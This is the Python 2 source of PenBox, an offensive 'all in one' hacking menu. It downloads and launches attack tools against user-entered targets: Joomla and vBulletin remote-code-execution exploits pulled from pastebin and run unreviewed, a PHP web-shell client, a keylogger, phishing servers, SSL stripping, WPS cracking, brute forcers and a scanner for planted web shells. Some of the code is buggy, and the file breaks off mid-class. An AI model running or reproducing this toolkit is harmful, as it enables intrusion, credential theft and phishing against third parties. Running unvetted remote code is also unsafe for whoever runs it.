Untitled

 #!/usr/bin/env python2.7
#
#          All In One Tool For Penetration Testing
#           Authors : Mohamed Nour , Fedy Wesleti

import sys
import argparse
import os
import time
import httplib
import subprocess
import re, urllib2
import socket
import urllib,sys,json
import telnetlib
import glob
import random
import Queue
import threading
import requests
import base64
from getpass import getpass
from commands import *
from sys import argv
from platform import system
from urlparse import urlparse
from xml.dom import minidom
from optparse import OptionParser
from time import sleep
##########################
#Variables
directories = ['/uploads/','/upload/','/files/','/resume/','/resumes/','/documents/','/docs/','/pictures/','/file/','/Upload/','/Uploads/','/Resume/','/Resume/','/UsersFiles/','/Usersiles/','/usersFiles/','/Users_Files/','/UploadedFiles/','/Uploaded_Files/','/uploadedfiles/','/uploadedFiles/','/hpage/','/admin/upload/','/admin/uploads/','/admin/resume/','/admin/resumes/','/admin/pictures/','/pics/','/photos/','/Alumni_Photos/','/alumni_photos/','/AlumniPhotos/','/users/']
shells = ['wso.php','shell.php','an.php','hacker.php','lol.php','up.php','cp.php','upload.php','sh.php','pk.php','mad.php','x00x.php','worm.php','1337worm.php','config.php','x.php','haha.php']
upload = []
yes = set(['yes','y', 'ye', 'Y'])
no = set(['no','n'])
ditect= ['13', '14', '15', '16', '17', '18', '19', '20', '21']
heathenchoice= ['4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
G = '\033[92m' #green
Y = '\033[93m' #yellow
B = '\033[94m' #blue
R = '\033[91m' #red
W = '\033[0m' #white
##########################
#end of varialbles
def logo():
    print  ("""%s
 _______  _______  _        ______   _______
(  ____ )(  ____ \( (    /|(  ___ \ (  ___  )|\     /|
| (    )|| (    \/|  \  ( || (   ) )| (   ) |( \   / )
| (____)|| (__    |   \ | || (__/ / | |   | | \ (_) /
|  _____)|  __)   | (\ \) ||  __ (  | |   | |  ) _ (
| (      | (      | | \   || (  \ \ | |   | | / ( ) \
| )      | (____/\| )  \  || )___) )| (___) |( /   \ )
|/       (_______/|/    )_)|/ \___/ (_______)|/     \| %s{v3.2}
                                     %sThe Hacker's Repo

%s
[+]       Coded BY %sFedy Wesleti %s& %sMohamed Nour          %s[+]
[-]           Facebook.com/%sPenBox.Framework %s            [-]
[-]             Greetz To All Pentesters                [-]
""")%(G,R,B,G,Y,G,Y,G,R,G)
def menu():
    print ("""

%s
 _______  _______  _        ______   _______
(  ____ )(  ____ \( (    /|(  ___ \ (  ___  )|\     /|
| (    )|| (    \/|  \  ( || (   ) )| (   ) |( \   / )
| (____)|| (__    |   \ | || (__/ / | |   | | \ (_) /
|  _____)|  __)   | (\ \) ||  __ (  | |   | |  ) _ (
| (      | (      | | \   || (  \ \ | |   | | / ( ) \
| )      | (____/\| )  \  || )___) )| (___) |( /   \ )
|/       (_______/|/    )_)|/ \___/ (_______)|/     \| %s{v3.2}
                                     %sThe Hacker's Repo

%s
[+]       Coded BY %sFedy Wesleti %s& %sMohamed Nour          %s[+]
[-]           Facebook.com/%sPenBox.Framework %s            [-]
[-]             Greetz To All Pentesters                [-]

    Select from the menu:

    1 : Information Gathering
    2 : Password Attacks
    3 : Wireless Testing
    4 : Exploitation Tools
    5 : Sniffing & Spoofing
    6 : Web Hacking
    7 : Private Tools
    8 : Post Exploitation
    9 : Recon
    10: Smartphones Penetration
    11: Others
    99: Exit

    """)%(G,R,B,G,Y,G,Y,G,R,G)
    choice = raw_input("Enter Your Choice: ")

    if choice == "1":
        info()
    elif choice == "2":
        passwd()
    elif choice == "3":
        wire()
    elif choice == "4":
        exp()
    elif choice == "5":
        snif()
    elif choice == "6":
        webhack()
    elif choice == "7":
        tnn()
    elif choice == "8":
        postexp()
    elif choice == "9":
        sniper()
    elif choice == "10":
        phones()
    elif choice == "11":
        others()
    elif choice == "99":
        sys.exit();
    elif choice == "":
        menu()
    else:
        menu()
def sniper():
    print ("This tool is only available for Linux / OSX or similar systems ")
    choicesniper = raw_input("Continue Y / N: ")
    if choicesniper in yes:
        os.system ("git clone https://github.com/1N3/Sn1per.git")
        os.system ("cd Sn1per && sudo bash ./install.sh")
        os.system ("sniper")
    elif choicesniper == "":
        menu()
def others():
    print("""
1) QrlJacking-Framework
2)Sniffles - Packet Capture Generator for IDS and Regular Expression Evaluation
99)
        """)
    otherc = raw_input("choose an option : ")
    if otherc =="1":
        qrljack()
    elif otherc =="2":
        sniffles()
    elif otherc =="99":
        menu()
    else:
        menu()
def sniffles():
    print("Sniffles is a tool for creating packet captures that will test IDS that use fixed patterns or regular expressions for detecting suspicious behavior")
    print("this tool requires python3.X")
    os.system("git clone https://github.com/petabi/sniffles && cd sniffles && python3 setup.py")
    print("if this tool is not properly installed , run : cd sniffles && python3.X setup.py or contact me fb.com/ceh.tn")
def qrljack():
    os.system("git clone https://github.com/OWASP/QRLJacking qrl && cd qrl && cd cd QrlJacking-Framework && pip install -r requirements.txt && python QRLJacker.py ")
def smartphones():
    print("""
  1 : APK Application scanning
  2 : Smartphones scanning
  99:
  """)
    spc = raw_input("Select an option : ")
    if spc =="1":
        droidhunter()
    if spc =="2":
        phones()
    if spc=="99":
        menu()
    else:
        menu()
def droidhunter():
    print ("Droid-Hunter - Android Application Vulnerability Analysis And Android Pentest Tool")
    print ("Do You To Install Droid-Hunter ?")
    choicedh = raw_input("Y/N: ")
    if choicedh in yes:
       os.system("git clone https://github.com/hahwul/droid-hunter.git && cd droid-hunter && sudo gem install html-table && gem install colorize && ruby dhunter.rb")
    elif choicedh in no:
        os.system('clear'); menu()
def phones():
    phoneslist = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']
    logo()
    print("""
        1 :  Attach Framework to a Deployed Agent/Create Agent"
        2 :  Send Commands to an Agent"
        3 :  View Information Gathered"
        4 :  Attach Framework to a Mobile Modem"
        5 :  Run a remote attack"
        6 :  Run a social engineering or client side attack"
        7 :  Compile code to run on mobile devices"
        8 :  Install Stuff"
        9 :  Use Drozer"
        10:  Setup API"
        11:  Bruteforce the Android Passcode given the hash and salt")
        99:  Exit""")
    choicespf = raw_input("Select an option : ")
    if choicespf in phoneslist:
        oschoice = raw_input("""This option will install Smartphone Pentest Framework for you , you will have to configure and run on your own
        1)OSX
        2)Kali Linux
        3)BackTrack
        Select Your OS : """)
        if oschoice =="1":
            os.system("git clone https://github.com/georgiaw/Smartphone-Pentest-Framework.git spf && cd spf && bash osxinstall.sh")
        if oschoice =="2":
            os.system("git clone https://github.com/georgiaw/Smartphone-Pentest-Framework.git spf && cd spf && bash kaliinstall ")
        if oschoice =="3":
            os.system("git clone https://github.com/georgiaw/Smartphone-Pentest-Framework.git spf && cd spf && bash btinstall")
    elif choice5 =="11":
        androidhash()
    else:
        menu()
def doork():
    print("doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks. ")
    doorkchice = raw_input("Continue Y / N: ")
    if doorkchice in yes:
        os.system("pip install beautifulsoup4 && pip install requests")
        os.system("git clone https://github.com/AeonDave/doork")
        clearScr()
        doorkt = raw_input("Target : ")
        os.system("cd doork && python doork.py -t %s -o log.log"%doorkt)
def postexp():
    clearScr()
    print("1 :  Shell Checker")
    print("2 :  POET")
    print("3 :  Weeman - Phishing Framework")
    print("4 : Insecure Web Interface")
    print("5 : Insufficient Authentication/Authorization")
    print("6 : Insecure Network Services")
    print("7 : Lack of Transport Encryption")
    print("8 : Privacy Concerns")
    print("9 : Insecure Cloud Interface")
    print("10: Insecure Mobile Interface")
    print("11: Insufficient Security Configurability")
    print("12: Insecure Software/Firmware")
    print("13: Poor Physical Security")
    print("14: Tinyshell : python Client with php shell")
    print("15: Radium-Keylogger - Python keylogger with multiple features ")
    print("99: Go Back ")
    choice11 = raw_input("Enter Your Choice:")
    if choice11 == "1":
        sitechecker()
    if choice11 == "2":
        poet()
    if choice11 == "3":
        weeman()
    if choice11 in heathenchoice:
        print("This Tool Will Work only on kali linux ")
        hchoice = raw_input("Continue ? Y / N : ")
        if hchoice in yes:
            os.system("git clone https://github.com/chihebchebbi/Internet-Of-Things-Pentesting-Framework.git heathen && cd heathen && bash Heathen.sh ")
        else :
            postexp()
    if choice11 == "14":
        tinyshell()
    if choice11 =="15":
        radium()
    elif choice11 == "99":
        menu()
def radium():
    print("This step will only download Radium-Keylogger for you , it will not install it  ")
    print("to install , cd Radium-Keylogger and see Requirements.txt first ")
    os.system("git clone https://github.com/mehulj94/Radium-Keylogger")
def tinyshell():
    print("This tool will create a php payload , that will let you remote access the webserver using python ")
    ctiny = raw_input("continue ? y/n : ")
    if ctiny in yes:
        os.system("git clone https://github.com/lawrenceamer/tinyshell.git")
        print("you will find the php payload in /tinyshell/shell.php with the default password : 123456 , insert it in a php script and connect")
        explurl = raw_input("Target link with php file : ")
        os.system("cd tinyshell && python remote_shell.py %s 123456"%explurl)
    elif ctiny in no:
        menu()
def scanusers():
    site = raw_input('Enter a website : ')
    try:
        users = site
        if 'http://www.' in users:
            users = users.replace('http://www.', '')
        if 'http://' in users:
            users = users.replace('http://', '')
        if '.' in users:
            users = users.replace('.', '')
        if '-' in users:
            users = users.replace('-', '')
        if '/' in users:
            users = users.replace('/', '')
        while len(users) > 2:
            print users
            resp = urllib2.urlopen(site + '/cgi-sys/guestbook.cgi?user=%s' % users).read()
            # i can use regular expression too
            if 'invalid username' not in resp.lower():
                print "\tFound -> %s" %users
                pass

            users = users[:-1]
    except:
        pass
def brutex():
    clearScr()
    print("Automatically brute force all services running on a target : Open ports / DNS domains / Usernames / Passwords ")
    os.system("git clone https://github.com/1N3/BruteX.git")
    clearScr
    brutexchoice = raw_input("Select a Target : ")
    os.system("cd BruteX && chmod 777 brutex && ./brutex %s"%brutexchoice)
def arachni():
    print("Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications")
    cara = raw_input("Install And Run ? Y / N : ")
    clearScr
    print("exemple : http://www.target.com/")
    tara = raw_input("Select a target to scan : ")
    if cara in yes:
        os.system("git clone git://github.com/Arachni/arachni.git")
        os.system("cd arachni && sudo gem install bundler && bundle install --without prof && rake install")
        os.system("arachni")
    clearScr()
    os.system("cd arachni/bin && chmod 777 arachni && ./arachni %s"%tara)
def xsstracer():
    clearScr()
    print("XSSTracer is a small python script that checks remote web servers for Clickjacking, Cross-Frame Scripting, Cross-Site Tracing and Host Header Injection.")
    os.system("git clone https://github.com/1N3/XSSTracer.git")
    clearScr ()
    xsstracerchoice = raw_input("Select a Target: ")
    os.system("cd XSSTracer && chmod 777 xsstracer.py && python xsstracer.py %s 80"%xsstracerchoice)
def weeman():
    print("HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).")
    choicewee = raw_input("Install Weeman ? Y / N : ")
    if choicewee in yes:
        os.system("git clone https://github.com/Hypsurus/weeman.git && cd weeman && python weeman.py")
    if choicewee in no:
        menu()
    else:
        menu()
def gabriel():
    print("Abusing authentication bypass of Open&Compact (Gabriel's)")
    os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py")
    clearScr()
    os.system("python gabriel.py")
    ftpbypass=raw_input("Enter Target IP and Use Command :")
    os.system("python gabriel.py %s"%ftpbypass)
def sitechecker():
    os.system("wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py")
    clearScr()
    os.system("python ch01.py")
def h2ip():
    host = raw_input("Select A Host : ")
    ips = socket.gethostbyname(host)
    print(ips)
def ports():
    clearScr()
    target = raw_input('Select a Target IP :')
    os.system("nmap -O -Pn %s" % target)
    sys.exit();
def ifinurl():
    print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found."""
    print('Do You Want To Install InurlBR ? ')
    cinurl = raw_input("Y/N: ")
    if cinurl in yes:
        inurl()
    if cinurl in no:
        menu()
    elif cinurl == "":
        menu()
    else:
        menu()
def bsqlbf():
    clearScr()
    print("This tool will only work on blind sql injection")
    cbsq=raw_input("select target : ")
    os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl")
    os.system("perl bsqlbf.pl -url %s"%cbsq)
    os.system("rm bsqlbf.pl")
def venom():
    print ("Venom Automatic Shellcode Generator")
    print ("Do You To Install ?")
    choiceshell = raw_input("Y/N: ")
    if choiceshell in yes:
        os.system("wget http://fsociety.tn/venom.zip --output-document=venom.zip")
        os.system("unzip venom.zip -d venom")
        os.system("cd venom && sh venom.sh")
    elif choiceshell in no:
        os.system('clear'); info()
def commix():
    print ("Automated All-in-One OS Command Injection and Exploitation Tool.")
    print ("usage : python commix.py --help")
    choicecmx = raw_input("Continue: y/n :")
    if choicecmx in yes:
        os.system("git clone https://github.com/stasinopoulos/commix.git commix")
        os.system("cd commix")
        os.system("python commix.py")
        os.system("")
    elif choicecmx in no:
        os.system('clear'); info()
def pixiewps():
    print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only
    """
    choicewps = raw_input("Continue ? Y/N : ")
    if choicewps in yes :
        os.system("git clone https://github.com/wiire/pixiewps.git")
        os.system(" cd pixiewps/src & make ")
        os.system(" cd pixiewps/src & sudo make install")
    if choicewps in no :
        menu()
    elif choicewps == "":
        menu()
    else:
        menu()
def webhack():
    print("1 : Drupal Hacking ")
    print("2 : Inurlbr")
    print("3 : Wordpress & Joomla Scanner")
    print("4 : Gravity Form Scanner")
    print("5 : File Upload Checker")
    print("6 : Wordpress Exploit Scanner")
    print("7 : Wordpress Plugins Scanner")
    print("8 : Shell and Directory Finder")
    print("9 : Joomla! 1.5 - 3.4.5 remote code execution")
    print("10: Vbulletin 5.X remote code execution")
    print("11: BruteX - Automatically brute force all services running on a target")
    print("12: Arachni - Web Application Security Scanner Framework")
    print("13: Sub-domain Scanning")
    print("14: Wordpress Scanning")
    print("15: Wordpress Username Enumeration")
    print("16: Wordpress Backup Grabbing")
    print("17: Sensitive File Detection")
    print("18: Same-Site Scripting Scanning")
    print("19: Click Jacking Detection")
    print("20: Powerful XSS vulnerability scanning")
    print("21: SQL Injection vulnerability scanning")
    print("99: Go Back")
    choiceweb = raw_input("Enter Your Choice : ")
    if choiceweb == "1":
        clearScr()
        maine()
    if choiceweb == "2":
        clearScr(); ifinurl()
    if choiceweb =='3':
        clearScr(); wppjmla()
    if choiceweb =="4":
        clearScr(); gravity()
    if choiceweb =="5":
        clearScr(); sqlscan()
    if choiceweb =="6":
        clearScr(); wpminiscanner()
    if choiceweb =="7":
        clearScr();wppluginscan()
    if choiceweb =="8":
        clearScr();shelltarget()
    if choiceweb =="9":
        clearScr();joomlarce()
    if choiceweb =="10":
        clearScr();vbulletinrce()
    if choiceweb =="11":
        clearScr();brutex()
    if choiceweb=="12":
        clearScr();arachni()
    if choiceweb in ditect:
        dtect()
    elif choiceweb =="99":
        menu()
    elif choiceweb == "":
        menu()
    else:
        menu()
def vbulletinrce():
    os.system("wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl")
    os.system("perl tmp.pl")
def joomlarce():
    os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py")
    clearScr();print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt")
    jmtarget=raw_input("Select a targets list :")
    os.system("python temp.py %s"%jmtarget)
def inurl():
    dork = raw_input("select a Dork:")
    output = raw_input("select a file to save :")
    os.system("./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output))
    if cinurl in no:
        insinurl()
    elif cinurl == "":
        menu()
    else:
        menu()
def insinurl():
    os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
    os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
    os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
    os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php")
    clearScr()
    inurl()
def dtect():
    print("This will install and run D-TECT Penetration testing framework")
    cdtect=raw_input("Continue ? Y/N : ")
    if cdtect in yes:
        os.system("git clone https://github.com/shawarkhanethicalhacker/D-TECT.git && cd D-TECT && python d-tect.py")
    else :
        menu()
def nmap():

    choice7 = raw_input("continue ? Y / N : ")
    if choice7 in yes :
        os.system("wget https://nmap.org/dist/nmap-7.01.tar.bz2")
        os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -")
        os.system("cd nmap-7.01 & ./configure")
        os.system("cd nmap-7.01 & make")
        os.system("su root")
        os.system("cd nmap-7.01 & make install")
    elif choice7 in no :
        info()
    elif choice7 == "":
        menu()
    else:
        menu()
def jboss():
    os.system('clear')
    print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
    print ("deployed, the script uses its upload and command execution capability to")
    print ("provide an interactive session.")
    print ("")
    print ("usage : ./e.sh target_ip tcp_port ")
    print("Continue: y/n")
    choice9 = raw_input("yes / no :")
    if choice9 in yes:
        os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git"),sys.exit();
    elif choice9 in no:
        os.system('clear'); exp()
    elif choice9 == "":
        menu()
    else:
        menu()
def wppluginscan():
    Notfound = [404,401,400,403,406,301]
    sitesfile = raw_input("sites file : ")
    filepath = raw_input("Plugins File : ")
    def scan(site, dir):
        global resp
        try:
                conn = httplib.HTTPConnection(site)
                conn.request('HEAD', "/wp-content/plugins/" + dir)
                resp = conn.getresponse().status
        except(), message:
                print "Cant Connect :",message
                pass
    def timer():
        now = time.localtime(time.time())
        return time.asctime(now)
    def main():
        sites = open(sitesfile).readlines()
        plugins = open(filepath).readlines()
        for site in sites:
            site = site.rstrip()
        for plugin in plugins:
            plugin = plugin.rstrip()
            scan(site,plugin)
            if resp not in Notfound:
                    print "+----------------------------------------+"
                    print "| current site :" + site
                    print "| Found Plugin : "  + plugin
                    print "| Result:",resp
def sqlmap():
    print ("usage : python sqlmap.py -h")
    choice8 = raw_input("Continue: y/n :")
    if choice8 in yes:
        os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ")
    elif choice8 in no:
        os.system('clear'); info()
    elif choice8 == "":
        menu()
    else:
        menu()
def grabuploadedlink(url):
    try :
                    for dir in directories :
                              currentcode = urllib.urlopen(url + dir).getcode()
                              if currentcode == 200 or currentcode ==  403:
                                     print "-------------------------"
                                     print "  [ + ] Found Directory :  " + str(url + dir)               + " [ + ]"
                                     print "-------------------------"
                                     upload.append(url + dir)
    except :
      pass
def grabshell(url) :
   try :
        for upl in upload :
                            for shell in shells :
                              currentcode = urllib.urlopen(upl + shell).getcode()
                              if currentcode == 200 :
                                     print "-------------------------"
                                     print "  [ ! ] Found Shell :  " + str(upl + shell)         + " [ ! ]"
                                     print "-------------------------"
   except :
        pass
def shelltarget():
    print("exemple : http://target.com")
    line = raw_input("target : ")
    line = line.rstrip()
    grabuploadedlink(line)
    grabshell(line)
def poet():
    print("POET is a simple POst-Exploitation Tool.")
    print("")
    choicepoet = raw_input("y / n :")
    if choicepoet in yes:
        os.system("git clone https://github.com/mossberg/poet.git")
        os.system("python poet/server.py")
    if choicepoet in no:
        clearScr(); postexp()
    elif choicepoet == "":
        menu()
    else:
        menu()
def setoolkit():
    print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
    print(") designed for social engineering. SET has a number of custom attack vectors that ")
    print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC  ")
    print("an information security consulting firm located in Cleveland, Ohio.")
    print("")
    choiceset = raw_input("y / n :")
    if choiceset in yes:
        os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git")
        os.system("python social-engineer-toolkit/setup.py")
    if choiceset in no:
        clearScr(); info()
    elif choiceset == "":
        menu()
    else:
        menu()
def cupp():
    print("cupp is a password list generator ")
    print("Usage: python cupp.py -h")
    choicecupp = raw_input("Continue: y/n : ")

    if choicecupp in yes:
        os.system("git clone https://github.com/Mebus/cupp.git")
        print("file downloaded successfully")
    elif choicecupp in no:
        clearScr(); passwd()
    elif choicecupp == "":
        menu()
    else:
        menu()
def ncrack():
    print("A Ruby interface to Ncrack, Network authentication cracking tool.")
    print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3")
    print("Continue: y/n")
    choicencrack = raw_input("y / n :")
    if choicencrack in yes:
        os.system("git clone https://github.com/sophsec/ruby-ncrack.git")
        os.system("cd ruby-ncrack")
        os.system("install ruby-ncrack")
    elif choicencrack in no:
        clearScr(); passwd()
    elif choicencrack == "":
        menu()
    else:
        menu()
def reaver():
    print """
      Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup
      WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a
      wide variety of access points and WPS implementations
      1 to accept / 0 to decline
        """
    creaver = raw_input("y / n :")
    if creaver in yes:
        os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps")
        os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git")
        os.system("cd reaver-wps-fork-t6x/src/ & ./configure")
        os.system("cd reaver-wps-fork-t6x/src/ & make")
    elif creaver in no:
        clearScr(); wire()
    elif creaver == "":
        menu()
    else:
        menu()
def ssls():
    print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping
    attacks.
    It requires Python 2.5 or newer, along with the 'twisted' python module."""
    cssl = raw_input("y / n :")
    if cssl in yes:
        os.system("git clone https://github.com/moxie0/sslstrip.git")
        os.system("sudo apt-get install python-twisted-web")
        os.system("python sslstrip/setup.py")
    if cssl in no:
        snif()
    elif cssl =="":
        menu()
    else:
        menu()
def unique(seq):
        seen = set()
        return [seen.add(x) or x for x in seq if x not in seen]
def bing_all_grabber(s):

        lista = []
        page = 1
        while page <= 101:
                try:
                        bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
                        openbing = urllib2.urlopen(bing)
                        readbing = openbing.read()
                        findwebs = re.findall('<h2><a href="(.*?)"', readbing)
                        for i in range(len(findwebs)):
                                allnoclean = findwebs[i]
                                findall1 = re.findall('http://(.*?)/', allnoclean)
                                for idx, item in enumerate(findall1):
                                        if 'www' not in item:
                                                findall1[idx] = 'http://www.' + item + '/'
                                        else:
                                                findall1[idx] = 'http://' + item + '/'
                                lista.extend(findall1)

                        page += 50
                except urllib2.URLError:
                        pass

        final = unique(lista)
        return final
def check_gravityforms(sites) :
        import urllib
        gravityforms = []
        for site in sites :
                try :
                        if urllib.urlopen(site+'wp-content/plugins/gravityforms/gravityforms.php').getcode() == 403 :
                                gravityforms.append(site)
                except :
                        pass

        return gravityforms
def gravity():
    ip = raw_input('Enter IP : ')
    sites = bing_all_grabber(str(ip))
    gravityforms = check_gravityforms(sites)
    for ss in gravityforms :
            print ss

    print '\n'
    print '[*] Found, ', len(gravityforms), ' gravityforms.'
def shellnoob():
    print """Writing shellcodes has always been super fun, but some parts are extremely boring and error prone. Focus only on the fun part, and use ShellNoob!"""
    cshell = raw_input("Y / N : ")
    if cshell in yes:
        os.system("git clone https://github.com/reyammer/shellnoob.git")
        os.system("mv shellnoob/shellnoob.py shellnoob.py")
        os.system("sudo python shellnoob.py --install")
    if cshell in no:
        exp()
    elif cshell =="":
        menu()
    else:
        menu()
def info():
    print("1 : NMAP ")
    print("2 : Setoolkit")
    print("3 : Port Scanning")
    print("4 : Host To IP")
    print("5 : WP User Enumeration")
    print("6 : CMS scanner")
    print("7 : XSStracer ")
    print("8 : Doork")
    print("9 : Server Users")
    print("99: Go Back")
    choice2 = raw_input("Enter Your Choice: ")
    if choice2 == "1":
        os.system('clear'); nmap()
    if choice2 == "2":
        clearScr(); setoolkit()
    if choice2 == "3":
        clearScr(); ports()
    if choice2 == "4":
        clearScr(); h2ip()
    if choice2 == "5":
        clearScr(); wpue()
    if choice2 == "6":
        clearScr(); cmsscan()
    if choice2 == "7":
        clearScr(); xsstracer()
    if choice2 == "8":
        clearScr();doork()
    elif choice2 =="99":
        clearScr(); menu()
    if choice2 == "9":
        clearScr();scanusers()
    elif choice2 == "":
        menu()
    else:
        menu()
def cmsscan():
    os.system("git clone https://github.com/Dionach/CMSmap.git")
    clearScr();
    xz=raw_input("select target : ")
    os.system("cd CMSmap @@ sudo cmsmap.py %s"%xz)
def wpue():
    os.system("git clone https://github.com/wpscanteam/wpscan.git")
    clearScr();
    xe=raw_input("Select a Wordpress target : ")
    os.system("cd wpscan && sudo ruby wpscan.rb --url %s --enumerate u"%xe)
def priv8():
    tnn()
def androidhash():
    key=raw_input("Enter the android hash : ")
    salt=raw_input("Enter the android salt : ")
    os.system("git clone https://github.com/PentesterES/AndroidPINCrack.git")
    os.system("cd AndroidPINCrack && python AndroidPINCrack.py -H %s -s %s"% (key, salt))
def passwd():
    print("1: Cupp ")
    print("2: Ncrack")
    print("3: AutoBrowser Screenshot")
    print("99: Back To Main Menu")
    choice3 = raw_input("Select from the menu:")
    if choice3 =="1":
     clearScr(); cupp()
    elif choice3 =="2":
        clearScr(); ncrack()
    elif choice3 =="3":
        autobrowser()
    elif choice3 =="99":
        clearScr(); menu()
    elif choice3 == "":
        menu()
    elif choice3 == "3":
        fb()
    else:
        menu()
def autobrowser():
    os.system("git clone https://github.com/El3ct71k/AutoBrowser && cd AutoBrowser && pip install -r requirements")
    print("to execute: cd AutoBrowser && python AutoBrowser.py")
def bluepot():
    print("you need to have at least 1 bluetooh receiver (if you have many it will work wiht those, too). You must install / libbluetooth-dev on Ubuntu / bluez-libs-devel on Fedora/bluez-devel on openSUSE ")
    choice = raw_input("Continue ? Y / N : ")
    if choice in yes:
        os.system("wget https://github.com/andrewmichaelsmith/bluepot/raw/master/bin/bluepot-0.1.tar.gz && tar xfz bluepot-0.1.tar.gz && sudo java -jar bluepot/BluePot-0.1.jar")
    else :
        menu()
def fluxion():
    print("Fluxion is a remake of linset by vk496 with less bugs and more features. It's compatible with the latest release of Kali (Rolling). Latest builds (stable) and (beta) HERE . If you new, please start reading the wiki")
    print("Requirements : A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. A external wifi card is recommended. ")
    os.system("git clone https://github.com/deltaxflux/fluxion && cd fluxion && sudo bash Installer.sh")
def wire():
    print("1 : Reaver ")
    print("2 : PixieWPS")
    print("3 : Bluetooth Honeypot GUI Framework")
    print("4 : Fluxion - WPA/WPA2 Security Hacking Without Brute Force ")
    print("99: Go Back")
    choice4 = raw_input("Enter Your Choice: ")
    if choice4 =="1":
     clearScr();reaver()
    if choice4 =="2":
        clearScr(); pixiewps()
    if choice4 =="3":
        bluepot()
    if choice4 =="4":
        fluxion()
    elif choice4 =="99":
        menu()
    elif choice4 == "":
        menu()
    else:
        menu()
def exp():
    print("1 : Venom")
    print("2 : SqlMAP")
    print("3 : Shellnoob")
    print("4 : Commix")
    print("5 : FTP Auto Bypass")
    print("6 : JBoss-autopwn")
    print("7 : Bsqlbf")
    print("8 : CMS Few")
    print("9 : BLACKBOx")
    print("10: Liffy")
    print("99: Go Back")
    choice5 = raw_input("Enter Your Choice: ")
    if choice5 =="2":
        clearScr(); sqlmap()
    if choice5 =="1":
     os.system('clear'); venom()
    if choice5 =="3":
        clearScr(); shellnoob()
    if choice5 =="4":
        os.system("clear"); commix()
    if choice5 =="5":
        clearScr(); gabriel()
    if choice5 =="6":
        clearScr(); jboss()
    if choice5 =="7":
        clearScr();bsqlbf()
    if choice5 =="8":
        cmsfew()
    if choice5 =="9":
        blackbox()
    if choice5 =="10":
        liffy()
    elif choice5 =="99":
        menu()
    elif choice5 == "":
        menu()
    else:
        menu()

def liffy():
    os.system("git clone https://github.com/hvqzao/liffy.git && cd liffy")
    os.system("pip install requests && pip install argparse && pip install blessings && pip install urlparse && pip install daemon")
    os.system("python liffy.py -h")
    commandlfi = raw_input("Enter Liffy Command: ")
    os.system("python liffy.py %S"%commandlfi)
def blackbox():
    os.system("git clone https://darkeye@bitbucket.org/darkeye/blackbox.git && cd blackbox")
    os.system("python blackbox.py -h")
    blackboxmodule = raw_input("Choose A Module: ")
    os.system("python blackbox.py %s")%blackboxmodule
def snif():
    print("1 : Setoolkit ")
    print("2 : SSLtrip")
    print("3 : pyPISHER")
    print("4 : SMTP Mailer")
    print("99: Back To Main Menu")
    choice6 = raw_input("Select from the menu:")
    if choice6 =="1":
     clearScr(); setoolkit()
    if choice6 =="2":
        clearScr(); ssls()
    if choice6 =="3":
        clearScr(); pisher()
    if choice6 =="4":
        clearScr(); smtpsend()
    if choice6 =="99":
       clearScr(); menu()
    elif choice6 == "":
        menu()
    else:
        menu()
def cmsfew():
    print("Your target must be Joomla, Mambo, PHP-Nuke, and XOOPS Only ")
    target = raw_input("Select a target : ")
    os.system("wget https://dl.packetstormsecurity.net/UNIX/scanners/cms_few.py.txt -O cms.py")
    os.system("python cms.py %s"%target)
def smtpsend():
    os.system("wget http://pastebin.com/raw/Nz1GzWDS --output-document=smtp.py")
    clearScr()
    os.system("python smtp.py")
def pisher():
    os.system("wget http://pastebin.com/raw/DDVqWp4Z --output-document=pisher.py")
    clearScr()
    os.system("python pisher.py")
menuu = """
 1 : Get all websites
 2 : Get joomla websites
 3 : Get wordpress websites
 4 : Find control panel
 5 : Find zip files
 6 : Find upload files
 7 : Get server users
 8 : Scan from SQL injection
 9 : Scan ports (range of ports)
 10: Scan ports (common ports)
 11: Get server banner
 12: Bypass Cloudflare
 99: Exit
"""
def unique(seq):
    """
    get unique from list found it on stackoverflow
    """
    seen = set()
    return [seen.add(x) or x for x in seq if x not in seen]
def clearScr() :
    """
    clear the screen in case of GNU/Linux or
    windows
    """
    if system() == 'Linux':
        os.system('clear')
    if system() == 'Windows':
        os.system('cls')
class TNscan : #TNscan Function menu
    def __init__(self, serverip) :
        self.serverip = serverip
        self.getSites(False)
        print menuu
        while True :
            choice = raw_input(' Enter choice -> ')
            if choice == '1' :
